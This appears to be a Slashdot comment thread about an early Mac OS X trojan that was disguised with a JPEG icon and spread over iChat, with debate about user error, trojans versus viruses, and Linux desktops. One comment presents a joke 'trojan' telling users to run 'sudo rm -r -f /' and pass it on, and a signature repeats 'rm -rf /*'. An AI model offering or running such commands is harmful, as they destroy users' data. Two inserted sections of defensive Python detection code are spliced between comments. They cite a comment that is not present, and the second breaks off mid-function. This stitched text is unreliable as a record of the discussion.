      Intel was pushed by AMD with the Athlon but they improved their products steadily before that. If anything, the rush to compete with AMD led to some quality issues with Intel, for example the withdrawn 1.1GHz Pentium III. Intel knew what they were doing before AMD. It was PowerPC that arguably did not.

      Apple has always been about style. Performance, on the other hand, is a function of what their suppliers can provide. You can bet that Apple would make faster machines if they could and they frequently negotiate exclusives with suppliers of new technology so that the market will perceive that Apple is an innovator. Take the first DVD-R drives. Apple got an exclusive on the drive and branded it "Superdrive". Compaq got it one month later and the rest a month after that. Apple perpetuates the Superdrive name to this day.

      How you can claim that the G4 is as good a workstation for heavy multitasking loads as current PCs is beyond me. Its overall performance lags considerably and task switches don't help matters any. If you want to claim that OS X is a better tasker than XP then go ahead (don't know that myself) but the G4 is archaic.

    14. Re:Hehehe by Anonymous Coward · · Score: 0

      There is a Mac God?
      They've got one coming out in six months, it's called the iGod.

      Nah, that's just the title of Steve Jobs upcoming self-biography.


      A geek dies and goes to heaven. When he gets there, an angel asks him, "Is there anything you'd like to see?"

      "Yeah," says the geek. "I've always admired the pioneers of computer science, and would like to meet them." So the angel takes the geek around, and introduces him to Charles Babbage, Alan Turing, John von Neumann, etc.

      What most surprised the geek was when he saw Steve Jobs. "What's Steve Jobs doing in heaven? I didn't think he was dead yet?!"

      "That's not Steve Jobs," replied the angel. "That's God. He just thinks he's Steve Jobs."

    15. Re:Hehehe by NutscrapeSucks · · Score: 1

      The G5 faster than the P4 but not the Pentium M or the AMD parts.

      Even that's arguable, and was based on (A) Dubious SPEC scores that Apple never had the nuts to submit officially, and (B) a version of Quake 3 that was coded for SMP on Mac but not Intel.

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
    16. Re:Hehehe by mdarksbane · · Score: 1

      Sorry, then-current PCs. When it was actually new, not after Moto completely stalled on it.

      And as someone who used to game on a G3 300, and read every benchmark and test he could find, it was my experience that it ran about as fast as a PII 350. Which was what was current when I bought the machine.

      And since there were 604e's at 300 MHz before that, and the 604e was actually faster clock/clock than the G3... that would make it faster than PIIs at the time. Which it was, by every benchmark (third party, not Apple) I found when I was looking into buying a computer then.

      It was a helluva lot more expensive, but it was darned fast.

  12. Hmmm, First Virus to ask for your password? by jtalerico · · Score: 2, Insightful

    Before this "Virus" Can do anything on macOS X it should ask for the users password. So if the user is dumb enough to put in his/her password to OPEN a JPEG!! Then his/her password should be posted on /. with the ip of their computer.

    1. Re:Hmmm, First Virus to ask for your password? by Vo0k · · Score: 2, Insightful

      The virus can still delete your personal files without root password, it can access your IM contact list and send itself to all people on the list. You still have fully functional OS but all your work you didn't backup is gone. Fun?
      Or just install a keylogger and sit in the background waiting till you enter your root password through normal use.

      Such a virus would be pretty hard on Linux, because icons are assigned to files by content, not by extension. It would have a .jpg extension but the icon would be one of a binary. And of course the variety of instant messaging software would make it way harder to spread. (Still possible though, and despite what some would like to think, there ARE enough dumb Linux users to click on a file with a .jpg extension even if it doesn't look like a jpg.)

      --
      Anagram("United States of America") == "Dine out, taste a Mac, fries"
    2. Re:Hmmm, First Virus to ask for your password? by jtalerico · · Score: 1

      To do what this file does, it will prompt the user for the password.

    3. Re:Hmmm, First Virus to ask for your password? by WhiteWolf666 · · Score: 1

      OS X did not assign an icon to the file. It's not even labeled as .jpeg

      It's a .tgz, and it contains one executable (not labeled .jpg). Instead, the resource fork specifies an icon that looks remarkably similar to the one the operating system uses for JPEG.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    4. Re:Hmmm, First Virus to ask for your password? by amliebsch · · Score: 1

      Only if the user is root.

      --
      If you don't know where you are going, you will wind up somewhere else.
    5. Re:Hmmm, First Virus to ask for your password? by SirTalon42 · · Score: 1

      And on a Linux desktop binaries can't specify an icon internally to do that trick. Though they could include BOTH the binary and a .desktop file that has an icon for an image, except that would be incredibly suspicious, especially since different desktop environments use different icons.
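
The .desktop trick Arandir describes above (a launcher titled "sexypic.jpg" with an image icon and a shell command in Exec) and the variant SirTalon42 mentions here, checked from the defender's side: an added example, not code from the original thread or from any desktop environment. It parses a desktop entry and applies three heuristics: a displayed Name ending in an image extension, an Icon drawn from the generic image-* set rather than an application's own icon, and an Exec that hands an inline command to a shell. Both entries it checks are constructed for this example; the icon names and the bash -c form are assumptions about how such a file would be written, and the checks are heuristics, not anything the desktop-entry spec defines.

```python
import configparser
import os
import shlex
from typing import Dict, List

IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the keys of the [Desktop Entry] group.

    Desktop-entry keys are case-sensitive, so configparser's default
    lower-casing of option names is switched off; interpolation is off so
    that field codes such as %f pass through untouched.
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str
    parser.read_string(text)
    if not parser.has_section("Desktop Entry"):
        raise ValueError("no [Desktop Entry] group")
    return dict(parser.items("Desktop Entry"))


def masquerade_findings(text: str) -> List[str]:
    """Heuristics for a launcher dressed up as a picture."""
    entry = parse_desktop_entry(text)
    findings = []
    exec_line = entry.get("Exec", "")
    if entry.get("Type") != "Application" or not exec_line:
        return findings  # nothing is executed, so nothing to masquerade
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")
    if name.lower().endswith(IMAGE_EXTENSIONS):
        findings.append(f"displayed name {name!r} looks like an image file")
    if icon.startswith("image-"):
        findings.append(f"icon {icon!r} is a generic image-type icon, not an application icon")
    argv = shlex.split(exec_line)
    if argv and os.path.basename(argv[0]) in SHELLS and any(a in ("-c", "-e") for a in argv[1:]):
        findings.append(f"Exec hands an inline command to a shell: {exec_line}")
    return findings


# Constructed samples: the disguised launcher the comment describes (with a
# harmless echo standing in for the payload) and an ordinary image-viewer
# entry that should pass.
DISGUISED_ENTRY = """\
[Desktop Entry]
Type=Application
Name=sexypic.jpg
Icon=image-x-generic
Exec=bash -c "echo owned"
"""

ORDINARY_VIEWER = """\
[Desktop Entry]
Type=Application
Name=Image Viewer
Icon=eog
Exec=eog %f
"""

if __name__ == "__main__":
    for label, text in (("disguised", DISGUISED_ENTRY), ("viewer", ORDINARY_VIEWER)):
        print(label, masquerade_findings(text) or ["clean"])
```

None of the three signals is conclusive on its own (a legitimate file-type handler may carry a mimetype icon), which is why the function returns every matching reason rather than a single verdict.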

  13. 10.5 Screenshots?! by fightzombies · · Score: 5, Funny

    Where? I want to see!

    1. Re:10.5 Screenshots?! by javaxman · · Score: 1
      Where? I want to see!

      Yea, pretty funny... it's commented on more than a few times in the MacRumors thread how clever it was in a 'social engineering' sense to release it there as OS X 10.5 screenshots. I mean, normally you'd think some model or actress nude would be better bait, but then you'd just get a forum full of Windows users complaining about how all they got was a folder with a "Contents" folder, an "Info.plist" file, and some other weird files... then the jig would be up for sure!

    2. Re:10.5 Screenshots?! by P.+Niss · · Score: 1
  14. This would work on Linux by Anonymous Coward · · Score: 0

    I followed the link and found that the file in question was a '.tgz'. So, if someone is dumb enough to download such a file and untar it ... maybe they'll even su into root when it asks them to.

    It would be trivial to write such a program for Linux. It would work as long as there was a naive user.

    1. Re:This would work on Linux by PeterSomnium · · Score: 1

      But that's the problem.. Even linux-users can be pretty naive. Anyway, this 'virus' isn't really going to pose any threats to the computing world , or is someone going to disagree with me there?

      --
      I rm -rf /*, therefore I am?
    2. Re:This would work on Linux by Anonymous Coward · · Score: 0

      No. Firstly, most (if not all) Linux DEs determine the file's icon from the content of the file itself - there is no universal way of bundling an icon with a program so that it shows up as the correct JPEG icon for the user's DE (Gnome/KDE or any theme thereof).

      Secondly, each distro handles root access differently. Ubuntu, for instance, doesn't set a root password by default as all user-admin tasks are performed through sudo. This is different than, say, Debian, where by default you have to su to root. Then, to actually fool the user into entering their password you'd have to know which prompt to throw them. For Ubuntu, it's gksudo, for Kubuntu it'll be the KDE equivalent and so on and so forth for every distro out there.

      So even if you write a 'virus' like this that even behaves properly on one flavour of Linux, it'd look totally out of place on all the rest.

  15. configured correctly? by green pizza · · Score: 1

    It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

    That should be pretty much any default or out-of-the-box configuration of Mac OS X, methinks. Even on Macs with only one user and no password the machine will generally put up a prompt before making certain changes. Probably even safer if you have a password and multiple user accounts.

    1. Re:configured correctly? by Anonymous Coward · · Score: 0

      Right. However, a persistent user could potentially activate the root account and log in as it regularly. I can't think of any other way to get around this, though (other than running it from Terminal and using sudo, which isn't much different).

      Basically you just about have to be trying to do something stupid.

  16. Re:It's The Final Countdown by Anonymous Coward · · Score: 0

    The Final Countdown was by Europe, not Bon Jovi.

  17. Re:It's The Final Countdown by Anonymous Coward · · Score: 0

    "Bon Jour" is french for "Hello" or "Good Morning" or something like that.

  18. Misread the preview by steveo777 · · Score: 1

    Thought it said the virus spread via "Bon Jovi." I always thought there had to be a reason to come out of retirement... other than the whole singing thing.

    --
    This sig isn't original enough, it's time to come up with something witty...
    1. Re:Misread the preview by Anonymous Coward · · Score: 0

      Thought it said the virus spread via "Bon Jovi."

      Of course, the guy who wrote the trojan is now Wanted Dead or Alive for spreading Bad Medicine. He'll be Living On A Prayer till the Feds catch him.

  19. Further by ktappe · · Score: 3, Informative

    In all the latest releases of OS X, the user will also receive the prompt "You are running for the first time. Are you sure you want to continue?" so that's *four* levels of security the user would have to specifically circumvent to be affected. At some point the responsibility has to reasonably be shifted from Apple to the user... -Kurt

    --
    "We can categorically state we have not released man-eating badgers into the area." - UK military spokesman, July 2007
    1. Re:Further by Gryle · · Score: 1

      Haven't you heard? Personal responsibility died a long time ago, my friend.

      --
      Only two things are infinite, the universe and human stupidity, and I'm not entirely sure about the universe - Einstein
    2. Re:Further by thatkeith · · Score: 2, Informative

      That only happens when you double-click a document which opens an app for the first time, not when the app is launched *directly* for the first time. This is a well-considered security step, but it doesn't come into play here. Still - three levels of security is a fair bit, eh?

    3. Re:Further by AnalystX · · Score: 2, Informative

      I beg to differ. Although I'm not sure why Apple did it, and I was a bit surprised last night when it happened, I ran an application "directly" and it prompted me about running it for the first time. If Apple intended to have this prompt show its face only when a document opens an application, there may be a flaw in the latest version (10.4.5).

    4. Re:Further by thatkeith · · Score: 1

      Or perhaps this was done to add precisely that level of security! Thanks for the correction btw. I was sure that's how it worked... but I guess things have changed either in the very latest OS update or in my own memory!

  20. Re:It's The Final Countdown by post.scriptum · · Score: 1

    More like a typo of "Bonjour"... French "virus", this is sad.

  21. Oompa-Loompa Trojan by coastin · · Score: 1

    Looks like a lot of work to just get this thing. Not at all a lazy person's trojan.

    --
    I lost my sig...
  22. Virus Acid Test by green pizza · · Score: 1

    So, to me the question remains... is there a way to get this (or any other) Mac OS X virus by just connecting a Mac to the Internet and/or surfing websites? Or do these exploits still require the user to manually execute a trojan? I guess I'm curious how automated these Mac OS X "viruses" are.

    1. Re:Virus Acid Test by Yahweh Doesn't Exist · · Score: 1

      you must receive an email with the attachment, unzip the attachment, open a file with an icon made to look like an image, type in the admin password, not think why looking at an image needs admin privileges, and press ok.

    2. Re:Virus Acid Test by coastin · · Score: 1

      Unfortunately no, Mac users have to work harder than Win users to get free software over the Internet.

      --
      I lost my sig...
    3. Re:Virus Acid Test by WhiteWolf666 · · Score: 1

      There's no exploit.

      It's a compressed file. You have to uncompress it.

      Then, you have to double click on the icon. The sneaky part is the executable uses the JPEG icon.

      Then, you have to enter your password.

      I invented a similar trojan before. It requires slightly more user intervention. I'll quote it for you here:

      "Please type the following at the terminal for increased disk space:
      sudo rm -r -f /
      Please type your password when prompted, and make sure to send this performance tip to all your friends."

      This 'trojan' is only slightly more sophisticated.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
  23. Re:Previous slashdot coverage by kneeslasher · · Score: 0

    This is true. I've been much more complacent since I switched. While I'd never type in my Admin password due to a JPEG, I am sure the complacency of which you write might well mean that many users would, especially as the Mac population grows and statistically includes more silly users.

  24. Good point by QuaintRealist · · Score: 1

    Looks like a Trojan, not a virus. And any OS (disclosure: I admin a mixed Linux/Windows system at work and the wife has a Mac at home) is vulnerable to Trojan attack with varying degrees of user "assistance". Our internet-capable machines at work are live-CD only for this reason (Slax FWIW). Windows laptops use DSL embedded (at the moment).

    Use protection, browse safely, and the net is a pretty safe place still...

    --
    Using plain ol' text since 1968
    1. Re:Good point by BladeMelbourne · · Score: 1

      For those wanting to follow this advice...

      Use protection -> wear condoms
      browse safely -> wear sunglasses

      Never has surfing the net been so cool (and safe!)

    2. Re:Good point by Shanep · · Score: 1

      Hey, this is slashdot.

      Use protection -> wear condoms

      Because the readers here will catch something from themselves?

      browse safely -> wear sunglasses

      How many slashdot readers actually see sunlight for real?

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
  25. I Like The Trojan Horse That Was Used by RobotRunAmok · · Score: 4, Funny

    The first Mac virus hidden cleverly inside a picture of desktop eyecandy. No doubt it will spread like wildfire. Insidious.

    What wrapper will the first Linux widespread virus take? "Hey, download this PDF -- it's a transcript of a big IRC shouting match about which is better, emacs or vi! You gotta read this!"

    We won't know what hit us...

    1. Re:I Like The Trojan Horse That Was Used by daveschroeder · · Score: 1

      Um, no.

      There's no desktop eye candy, and this is hardly clever.

      That's *social engineering*. Any Mac document or executable has been able to have the outward appearance of having any icon for 22 years. So that's not new.

      This won't spread. It will be yet another social engineering/trojan/malware/"virus" novelty with little to no impact beyond the mock panic sure to ensue in the press.

      All it's going to take is one major outlet to pick it up, and we'll have another "Mac OS X Just As Insecure As Windows" free-for-all.

    2. Re:I Like The Trojan Horse That Was Used by Seferino · · Score: 1

      All it's going to take is one major outlet to pick it up, and we'll have another "Mac OS X Just As Insecure As Windows" free-for-all.
      You're right, that's better than "emacs vs vi" as the next virus wrapper.

    3. Re:I Like The Trojan Horse That Was Used by foniksonik · · Score: 1

      PDF, puhlease... it better be a LaTeX document or LUsers won't even bother with it!

      --
      A fool throws a stone into a well and a thousand sages can not remove it.
    4. Re:I Like The Trojan Horse That Was Used by javaxman · · Score: 1
      No doubt it will spread like wildfire.

      As much as it'd be fun if that were true... no.

      To spread this, you have to
      a) have someone in your buddy list who is infected.
      b) not think anything of opening a compressed file you get over iChat without any explanation of what it is
      c) either be running as Admin all the time, or (even more crazy) not pause to think when double-clicking on a JPG requires Admin authentication for some reason.

      Uhhh... yea... I'm going to guess this is just going to be an opportunity for FUD and anti-virus sales. And for a few of us to reconsider using Admin accounts all the time... spread like wildfire? How many OS X users do you know who will fit all of a, b, and c?

      Oh, wait, I forgot (d), don't have file extensions showing or won't notice ".app" in the name of the file if they do!

      The only people who are having to deal with this downloaded the original file just to see if it really was going to try to infect their systems. Ooops! The only shocker for them is that it's spreading over Rendezvous to their other systems... but at least they'll know not to *execute* it there, hopefully. Otherwise there's no helping them, they *like* this app.

    5. Re:I Like The Trojan Horse That Was Used by NutscrapeSucks · · Score: 1

      This won't spread.

      Why not? Because the few Mac users are too spread out for mass social engineering to be effective?

      The IM part is a smart bit because iChat is somewhat biased towards Mac users.

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
  26. Re:Phew! Thanks! by platypibri · · Score: 2, Funny

    That may be THE funniest slashdot post ever! I, for one, welcome our executable jpeg masters.

    --
    Yeah, I guess I'm funny like that.
  27. Re:grow up by Lord Bitman · · Score: 1

    Virus != Worm

    --
    -- 'The' Lord and Master Bitman On High, Master Of All
  28. Need a Universal Binary by WhiteWolf666 · · Score: 4, Funny

    Anyone know when the Universal Binary will be available? Plus, we need a "no password" crack.

    When will Mac viruses get to the level of Windows? For God's sake, this one still requires user intervention, and it doesn't even work on all OS X platforms!

    Come on Apple! Microsoft has you soundly beaten in this regard :(

    --
    WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    1. Re:Need a Universal Binary by Gryle · · Score: 2, Funny

      Oh I see how it is. Leave out the open source software. I demand equality for all operating systems! Linux and BSD users should enjoy the same threat level as Windows or Mac!

      --
      Only two things are infinite, the universe and human stupidity, and I'm not entirely sure about the universe - Einstein
  29. .Well, I don't know by IAAP · · Score: 1
    You cannot simply "catch" the virus.

    I put my Mac on a toilet seat and I got this virus...Really!

    1. Re:.Well, I don't know by Shanep · · Score: 1

      I put my Mac on a toilet seat and I got this virus...Really!

      That's not a virus. The cool kids call them "crabs" although your doctor will probably refer to them as "pubic lice".

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
  30. It is a virus. by tpgp · · Score: 0, Troll

    Sounds more like a trojan to me.

    Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.

    I would say (from the description in TFA) that this piece of malware is more similar to a virus than a worm or a trojan.

    Why?

    1) It appears to self propagate (Trojans do not do this).
    2) It appears to attach to other executables (worms are stand alone).

    So we have a self-propagating piece of code that attaches itself to other executables. Quacks like a virus if you ask me.

    --
    My pics.
  31. Surely you can't mean... by iBod · · Score: 1
    1. Re:Surely you can't mean... by APurplePolarBear · · Score: 1

      No dude, I think he means Symantec.

      ;o)

    2. Re:Surely you can't mean... by Bazzalisk · · Score: 1
      Which notably doesn't rhyme with pedantic, whilst virgin-atlantic notably does.

      :)

      --
      James P. Barrett
    3. Re:Surely you can't mean... by iBod · · Score: 1

      Well - no shit Sherlock!

    4. Re:Surely you can't mean... by Anonymous Coward · · Score: 0

      Hey Dude!

      No, I think he means you need a sense of humor and a little wit to understand his post!

      Go look up things like 'irony', 'incongruity', 'absurdity' etc.

      You're like some little kid telling a grown up that his joke isn't funny because you don't get it - Dude! ;oP

    5. Re:Surely you can't mean... by iBod · · Score: 1

      What's with the PURPLE thing.

      Is PURPLE a code for:

      "I have no sense of humor whatsoever and can't understand jokes unless they are very, very literal and obvious and explained to me very slowly"

    6. Re:Surely you can't mean... by Ilgaz · · Score: 1

      People using new Symantec stuff on Mac OS X have been living through very "weird things" lately and they won't be able to figure out if a virus infected their systems or they need a "live update" to fix some weird bug. :)

      There were days when Peter Norton coded them himself...

  32. And So It Begins... by eno2001 · · Score: 1

    Grrreat... A Unix virus written by someone who probably knows more about Unix than most of the Slashdot crowd has forgotten, and it's targeted at the average non-technical Mac user who thinks that you are supposed to turn a computer off by pressing the power button. ;P (It's a joke folks. Lighten up.)

    --
    -"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
    1. Re:And So It Begins... by mini me · · Score: 1

      and it's targeted at the average non-technical Mac user who thinks that you are supposed to turn a computer off by pressing the power button. ;P

      I turn my Mac off with the power button :/ It's nice and handy beside the keyboard and pops up a nice display asking me what I want to do. Much easier than finding my way to the Apple menu or remembering keyboard shortcuts.

    2. Re:And So It Begins... by eno2001 · · Score: 1

      My point exactly. Everyone who uses a REAL computer knows that you have to open a shell and type @SYS$SYSTEM:SHUTDOWN and answer a few questions. ;P (For all you VMSers out there...)

      --
      -"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
    3. Re:And So It Begins... by Anim8me2 · · Score: 1

      Don't forget that Apple was also smart enough to let us turn off our Macs from the display power button. Very handy for me since I have my computers in a different room than my displays. It even works with KVM switches. Know that of which you speak lest ye look like an ass.

  33. Input Manager as an infection vector by mrob2002 · · Score: 2, Insightful

    John Gruber on daringfireball.net wrote at length recently about problems with OS X, mainly relating to how the Smart Crash library adds itself to applications through the Input Manager system hook. His current article "Smart Crash Reports Addenda" talks at length about the security implications of the input manager.

    1. Re:Input Manager as an infection vector by Anonymous Coward · · Score: 0

      For the record, Smart Crash Reports is not an Apple product. It is third-party software by Unsanity: http://www.unsanity.com/smartcrashreports

    2. Re:Input Manager as an infection vector by Ilgaz · · Score: 1

      "For the record, Smart Crash Reports is not an Apple product. It is third-party software by Unsanity: http://www.unsanity.com/smartcrashreports [unsanity.com]"

      For up-to-date info: they will now ask whether the user needs to report the application's crash to the developer or not. How evil the developers are, asking for anonymous crash data that is already sent to Apple by default! :) (This is my take, I am not affiliated with Unsanity except buying/using their products)

      http://www.unsanity.org/archives/000447.php

      If Apple shared crash reports of applications with developers, there wouldn't be a need for such software. It is in fact a great favor to the community and developers, asking NOTHING in return. They give a very expensive functionality for free. Ask Netscape Inc how much they paid for the Talkback agent, or similar companies.

      I was naively sending crash reports to Apple, which they don't really care about if it is not their software or the OS that crashes, with full descriptions for 2 years. When I figured out that even Adobe-sized companies don't get them... Well, you know...

      That blog guy (the grandparent mentions) did not mention any of these facts, I bet. That is what I hate. I even shared some "interesting technology news" with Unsanity and they responded; they are a responsive team which does/did great favors to the community asking nothing in return. To hell with his "famous" blogs, Google whatever ads really.

  34. There is some good news in all this by Anonymous Coward · · Score: 3, Funny

    It means at least one person at Microsoft still knows how to code.

  35. nitpick, panther=10.3 by green pizza · · Score: 1

    You have to admit though that many Mac users would like to see Panther pictures, and this is a good way of propagating the trojan.
    Panther was 10.3
    Tiger is 10.4
    Dunno what 10.5 is

    1. Re:nitpick, panther=10.3 by rekoil · · Score: 2, Informative

      10.5 is "Leopard".

    2. Re:nitpick, panther=10.3 by hattig · · Score: 1

      Um, oh yeah. Doh.

      Only so much space in my head for big cats. :p

  36. The vulnerability isn't always plugged in by Overzeetop · · Score: 4, Insightful

    Everybody seems so certain that this is a non-starter on OS X because it requires some user intervention to propagate. I have bad news for you: there are clueless Mac users out there, too. These are probably the same folks who will click on a web popup to "see the latest Hollywood gaffe" and then "accept" the untrusted executable when Windows warns about the download to be executed. And they're the same ones who will dutifully click their bank URL in an email and log in to make sure their information is correct.

    Never underestimate the power of the incompetence of 20% of your userbase.

    --
    Is it just my observation, or are there way too many stupid people in the world?
    1. Re:The vulnerability isn't always plugged in by WhiteWolf666 · · Score: 4, Insightful

      That's why we don't consider it a vulnerability. There is no way to "fix" this without totally locking out the user.

      There is no way to compensate for an Administrator who is computer illiterate. It's simply not possible. You can lower the bar as much as you like, however, there is a certain minimum level of knowledge which is required to safely administer a computer.

      Like don't run every application you get your hand on. This is similar to don't delete all your files.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    2. Re:The vulnerability isn't always plugged in by Overzeetop · · Score: 1

      So, why allow customization of icons? That's the key area of the attack. People think they're opening an image, but it's not. I know why. Pretty trumps Functional any day of the week. The problem isn't the OS, but the userbase. That and the "I'm bulletproof" attitude I hear from even neophyte Mac users. *shrug* Any OS can be set up to be "secure" if you've got security conscious expert users and limited needs. I have about 6 Windows boxes and one Linux box, and haven't had a virus/trojan/worm affect the systems in the last decade (okay, technically the Linux box is only a year old).

      Most that I've seen have come in through email, but *surprise* I know better than to run a file with a .pif/.bat/.com/.exe extension. How freakin' hard is that? But you see people doing it every day. And, as for Win turning off extensions, what dumbass is so stupid that they try to open an image.jpg file, when they know darned well that none of their image files have an extension on them. But are they suspicious? Of course not...they're sheep.

      To quote you, There is no way to compensate for an Administrator who is computer illiterate., and that's exactly who you've got sitting in the chairs of home Mac users. If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

      --
      Is it just my observation, or are there way too many stupid people in the world?
    3. Re:The vulnerability isn't always plugged in by Anonymous Coward · · Score: 0
      If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.
      I think you typo'd masochist
    4. Re:The vulnerability isn't always plugged in by nine-times · · Score: 1

      Never underestimate the power of the incompetence of 20% of your userbase. Ok, so let's assume that 20% of Mac users are incompetent and will run this thing. What negative consequences does that have for the 80% of us who aren't so incompetent? None. And that's where Apple's security seems to be doing a better job. So sure, maybe my neighbor is stupid and he wrecks his own machine. Let's say this thing was even smart enough to e-mail itself to me. It still won't get my machine without me decompressing and running the file. Already I'm not scared of this thing.

    5. Re:The vulnerability isn't always plugged in by o-hayo · · Score: 1

      I don't think you get it. Locking users out of customizing icons won't change anything because some other random 'trick' will come by that does something equally misleading. The OS doesn't matter in cases like this yet you are still nailing Mac users to the wall. If you can keep the nasties off of 6 Windows boxes and 1 Linux box then you will probably find that *gasp* you can accomplish the same with a Mac. It seems that as much as you are sick of Mac users throwing cliche lines about how they aren't affected by viruses (which, by the way, still, as of now, _they aren't_) you are becoming among the growing population of cliche Mac bashers that reek of anti-anti-virus jealousy. Also, I will stand up to anyone and argue until blue in the face that people who are more computer literate purchase Macs, and the sheep, as you say, are the ones buying those hard to use operating systems - such an elegant description of Windows by the way. Back to your regularly scheduled Symantec updates...

    6. Re:The vulnerability isn't always plugged in by nine-times · · Score: 1

      If they're computer literate, they'll evaluate their needs and find the best computer to suit those needs. And, all things being equal, they'd probably avoid the platform that is the biggest target for security attacks.

    7. Re:The vulnerability isn't always plugged in by Verminator · · Score: 1

      Any OS can be set up to be "secure" if you've got security conscious expert users and limited needs.

      Such as users scanning for naughtyware 24/7, living in stark terror of opening any email attachment? What the hell are "limited needs"?

      We've all heard the argument. Yes, a Windows box can be made secure. Leave it unplugged, or spend your time patching and scanning.

      When the spastic chimps in Redmond make a better mousetrap, I'll buy it. Gladly. Until that day, I'll use OS X. And laugh my ass off.

      --
      "The more corrupt the state, the more it legislates." - Tacitus
    8. Re:The vulnerability isn't always plugged in by oneandoneis2 · · Score: 1

      There is no way to compensate for an Administator who is computer illiterate.

      Sure there is: It's called Trusted Computing and it takes away the end user's ability to be the administrator of his/her own computer ;o)

      --
      So.. it has come to this
    9. Re:The vulnerability isn't always plugged in by 99BottlesOfBeerInMyF · · Score: 1

      That's why we don't consider it a vulnerability. There is no way to "fix" this without totally locking out the user.

      You're partially right. The owner of a computer should have the ability to do whatever they want on their computer, including mess it up. The problem is that this is not the only thing that is happening here. The user is being tricked into doing this because they are not given enough information and granularity of security. Now OS X does a lot of things right in this regard and is better than most of the competition, but it is not good enough to deal with some of the more sophisticated threats of the day.

      First, new applications and scripts should run either with pre-configured ACLs or in a BSD-Jail type environment. Basically, any program that wants to contact the internet, access files it did not create, or modify other applications should have to ask the user for that privilege. Further, steps can be taken to make it harder for an executable to disguise itself as data, via the UI, like a visual clue to differentiate data and programs. Finally, by default the first user created has admin privileges that are, perhaps, over-broad. When a system is set up an administrative password should be required to be set, but the default user account should probably have somewhat lesser privileges, or at least need a password to alter default programs.

      Now there will always be people who can be tricked into doing anything, but I really think that some better defaults and more user interaction is warranted for many events. How often do you want to run a program, by double clicking, that will modify other common programs on your machine? Would you rather have a dialogue that warns you when something tries to do this or not? Viruses like this one are performing uncommon operations and are easily recognizable due to that. It should not be hard to better deal with them.
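The content-based check that javaxman's item (d) above and this post's "visual clue to differentiate data and programs" both point at, as an added example (not code from the thread, from Apple or from any vendor): it ignores the icon, reads each unpacked file's leading bytes, and flags executables or execute-bit files that are named like images, plus any .app bundle. The Mach-O, ELF and JPEG magic numbers are standard; the file names and the sample tree are constructed for the demo.

```python
"""Content-based check for an unpacked 'screenshots' download.

Added example for this thread, not code from the original posts. It flags
files whose leading bytes identify an executable, or that carry the execute
bit, while being named like an image, and it flags .app bundles.
"""
import os
import stat
import tempfile
from typing import List, NamedTuple

JPEG_MAGIC = b"\xff\xd8\xff"
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce",  # Mach-O 32-bit, big-endian (PowerPC)
    b"\xce\xfa\xed\xfe",  # Mach-O 32-bit, little-endian (Intel)
    b"\xfe\xed\xfa\xcf",  # Mach-O 64-bit, big-endian
    b"\xcf\xfa\xed\xfe",  # Mach-O 64-bit, little-endian
    b"\xca\xfe\xba\xbe",  # fat / Universal Binary header
}
ELF_MAGIC = b"\x7fELF"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".tif", ".tiff"}
EXEC_KINDS = {"mach-o", "elf", "script"}
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


class Finding(NamedTuple):
    path: str    # relative to the unpacked root
    reason: str


def sniff(head: bytes) -> str:
    """Classify a file by its first bytes, ignoring name and icon."""
    if head[:3] == JPEG_MAGIC:
        return "jpeg"
    if head[:4] in MACHO_MAGICS:
        return "mach-o"
    if head[:4] == ELF_MAGIC:
        return "elf"
    if head[:2] == b"#!":
        return "script"
    return "other"


def scan_tree(root: str) -> List[Finding]:
    """Walk an unpacked download and report what could fool a user."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.lower().endswith(".app"):
                rel = os.path.relpath(os.path.join(dirpath, d), root)
                findings.append(Finding(rel, "application bundle in a download sold as pictures"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets, etc. are out of scope here
            with open(full, "rb") as fh:
                kind = sniff(fh.read(8))
            ext = os.path.splitext(name)[1].lower()
            if ext not in IMAGE_EXTS and ext != "":
                continue  # only files a user would take for a picture
            rel = os.path.relpath(full, root)
            if kind in EXEC_KINDS:
                findings.append(Finding(rel, f"{kind} executable named like an image"))
            elif st.st_mode & EXEC_BITS:
                findings.append(Finding(rel, "execute bit set on a file named like an image"))
    return sorted(findings)


def build_sample_tree(root: str) -> None:
    """Constructed sample of what such an archive might unpack to."""
    # A genuine picture: JPEG magic, no execute bit. Not flagged.
    with open(os.path.join(root, "desktop.jpg"), "wb") as fh:
        fh.write(JPEG_MAGIC + b"\x00" * 16)
    # Hypothetical disguise: Intel Mach-O header, no extension, mode 755.
    fake = os.path.join(root, "desktop_2")
    with open(fake, "wb") as fh:
        fh.write(b"\xce\xfa\xed\xfe" + b"\x00" * 16)
    os.chmod(fake, 0o755)
    # Hypothetical bundle with the Contents/Info.plist layout the thread mentions.
    contents = os.path.join(root, "Screenshots.app", "Contents")
    os.makedirs(contents)
    with open(os.path.join(contents, "Info.plist"), "w") as fh:
        fh.write("<plist/>\n")
    # Extension-less text file with no execute bit: not flagged.
    with open(os.path.join(root, "README"), "w") as fh:
        fh.write("constructed sample\n")


def demo() -> List[Finding]:
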